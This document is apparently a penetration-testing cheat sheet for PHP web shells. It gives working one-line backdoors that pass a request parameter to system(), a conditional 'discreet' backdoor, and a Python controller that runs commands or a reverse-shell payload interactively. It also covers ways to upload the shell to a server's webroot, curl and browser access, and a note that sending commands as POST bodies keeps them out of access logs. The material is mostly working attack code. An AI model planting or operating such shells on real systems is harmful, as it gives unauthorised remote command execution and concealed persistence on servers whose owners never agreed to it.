PHP

FORMAT

DIRECT

root@oco:~$ nano phpWebShell.php
 ...
 <?php system($_REQUEST["cmd"]); ?>
 ...
 
#access (the file name has to be part of the URL; quote it so the shell does not expand ? and &)
root@oco:~$ curl "http://{targetSite:port}/phpWebShell.php?cmd=id"

#one-liner alternative. keep double quotes around cmd: a single quote inside the single-quoted
#shell string would end the string early, and system() already prints the command output, so
#wrapping it in echo only repeats the last line
root@oco:~$ echo '<?php system($_REQUEST["cmd"]); ?>' > shell.php

GET REQUEST

root@oco:~$ echo '<?php system($_GET["cmd"]); ?>' > shell.php

 * system() takes the URL parameter cmd as input and executes it as a
   system command on the web server; the command's output is written into
   the HTTP response and the command runs as the web server user (e.g. www-data).

 * $_GET only reads the query string, so the command has to be URL-encoded
   there (spaces, &, ; and | must be percent-encoded or the command is cut
   short or split into extra parameters). the $_REQUEST variant above also
   accepts cmd from a POST body or a cookie.
   
 * this is a non-interactive shell as it runs a single command per request 
   and returns the result. there's no back-and-forth, ongoing interaction 
   like in a terminal or shell, and every command sent in the query string
   ends up in the web server's access log as part of the request line.

CONDITIONAL

acts as a standalone backdoor. it only runs a command when the cmd parameter is actually present in the request (isset), so a request for the file without cmd returns an empty page instead of an undefined index warning, and die stops PHP right after the command so nothing else is rendered. simple, discreet and effective on its own.

root@oco:~$ nano backdoor.php
 <?php if(isset($_REQUEST['cmd'])){ $cmd = $_REQUEST['cmd']; system($cmd); die; } ?>

OPTIONAL CONTROLLER

this optional piece isn't required for the PHP shell to function. it is a convenience tool that automates interaction with the PHP shell: sending a one-time payload (for example a reverse shell command) or running an interactive loop, so the operator does not have to hand-craft a URL per command during post-exploitation.

in essence, the PHP shell is the implant and the Python script is an optional controller that streamlines engagement.

root@oco:~$ nano webShell.py
#!/usr/bin/env python3
# optional controller for the PHP shell above: one-shot payload or interactive loop
import argparse, time, requests, os

parser = argparse.ArgumentParser(description="Interactive Web Shell for PoCs")
parser.add_argument("-t", "--target", help="Specify the target host E.g. http://<TARGET IP>:3001/uploads/backdoor.php", required=True)
parser.add_argument("-p", "--payload", help="Specify the reverse shell payload E.g. a python3 reverse shell. IP and Port required in the payload")
parser.add_argument("-o", "--option", help="Interactive Web Shell with loop usage: python3 web_shell.py -t http://<TARGET IP>:3001/uploads/backdoor.php -o yes")
args = parser.parse_args()   # -t is required, so argparse itself prints the usage and exits when it is missing

def run(cmd):
    # params= URL-encodes the command (spaces, &, ; | ...) and appends ?cmd=... to the shell URL.
    # concatenating "/?cmd=" + cmd would neither encode the command nor work on servers that
    # do not accept a trailing "/" after backdoor.php
    return requests.get(args.target, params={"cmd": cmd}).text

if not args.payload and args.option != "yes":   # nothing to do: show the help menu
    parser.print_help()
if args.payload:                                # one-shot: send the payload and print whatever comes back
    print(run(args.payload))
if args.option == "yes":                        # interactive: one HTTP request per command, forever
    os.system("clear")                          # clear the screen (linux)
    while True:
        try:
            cmd = input("$ ")
            print(run(cmd))
            time.sleep(0.3)                     # small pause between requests
        except requests.exceptions.InvalidSchema:
            print("Invalid URL Schema: http:// or https://")
        except requests.exceptions.ConnectionError:
            print("URL is invalid")
        except (KeyboardInterrupt, EOFError):   # Ctrl-C / Ctrl-D leaves the loop cleanly
            break

UPLOAD METHODS

SITE UPLOAD METHOD

once the shell file is written it must be uploaded to the target's web directory (webroot) so the web server executes it when the file is requested through the browser. a plain web shell needs no IPs or ports of its own; those only matter for a reverse shell payload sent through it later.

root@oco:~$ BROWSER > {targetSite:port} > File Upload
 ...

RCE METHOD

root@target:~$ echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
 ...

ACCESS

BROWSER METHOD

root@oco:~$ BROWSER > http://SERVER_IP:PORT/shell.php?cmd=id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

CLI METHOD

root@oco:~$ curl "http://{targetSite:port}/phpWebShell.php?cmd=id"
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

quote the URL so the local shell does not interpret ? and &, and URL-encode any command that contains spaces or shell metacharacters, otherwise the target only receives the part before the first space or &.
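The encoding and $_GET versus $_REQUEST points made in the GET REQUEST notes and in the CLI method above, as an added Python example (this is not code from the original page). It assumes a hypothetical target URL and sends nothing over the network: it only constructs the URL or POST body the one-line shells expect and models which PHP superglobal would receive the command.

```python
"""Request construction for the one-line PHP shells on this page.

Added example, not from the original page. TARGET is a hypothetical URL and nothing
is sent on the network: the functions build the URL / form body so the encoding can
be inspected, and php_sees() models which PHP superglobal would receive the command.
"""
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Hypothetical target (RFC 5737 documentation address); use wherever the shell was uploaded.
TARGET = "http://192.0.2.10:3001/uploads/shell.php"


def build_get_url(target: str, cmd: str) -> str:
    """URL for the $_GET (and $_REQUEST) shells: the command rides in the query string.

    urlencode() percent-encodes '/', '|', ';', '&' and turns spaces into '+', so a command
    such as 'cat /etc/passwd | head -n 3' arrives intact instead of being cut at the first
    space or split into extra parameters at an '&'.
    """
    parts = urlsplit(target)
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode({"cmd": cmd}), ""))


def build_post(target: str, cmd: str) -> Tuple[str, str]:
    """URL and application/x-www-form-urlencoded body for the $_REQUEST shell.

    $_REQUEST merges query string, form body and cookies, so the same shell also accepts
    the command in a POST body. The web server's access log records only the request line
    ("POST /uploads/shell.php HTTP/1.1"), not the body, so the command itself does not land
    in the log the way a ?cmd=... query string does. A $_GET-only shell ignores the body.
    """
    return target, urlencode({"cmd": cmd})


def php_sees(url: str, body: str, superglobal: str) -> Optional[str]:
    """Model the value PHP's $_GET['cmd'] or $_REQUEST['cmd'] would hold for a request.

    $_GET reads the query string only. $_REQUEST reads both; when cmd is present in both,
    PHP fills it in request_order and the common php.ini default "GP" lets the POST value
    override the GET one. This mirrors PHP's semantics for this single parameter only.
    """
    query = parse_qs(urlsplit(url).query).get("cmd", [None])[0]
    form = parse_qs(body).get("cmd", [None])[0]
    if superglobal == "_GET":
        return query
    if superglobal == "_REQUEST":
        return form if form is not None else query
    raise ValueError("expected '_GET' or '_REQUEST', got %r" % superglobal)


if __name__ == "__main__":
    for cmd in ("id", "cat /etc/passwd | head -n 3"):
        print("GET :", build_get_url(TARGET, cmd))
        url, body = build_post(TARGET, cmd)
        print("POST:", url, "body:", body)
        print("  $_GET sees:", php_sees(url, body, "_GET"),
              "| $_REQUEST sees:", php_sees(url, body, "_REQUEST"))
```

The same encoding is what curl's -G --data-urlencode "cmd=..." produces for the GET form and --data-urlencode "cmd=..." without -G produces for the POST form; the POST form only works against the $_REQUEST shells, the $_GET shell needs the query string.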
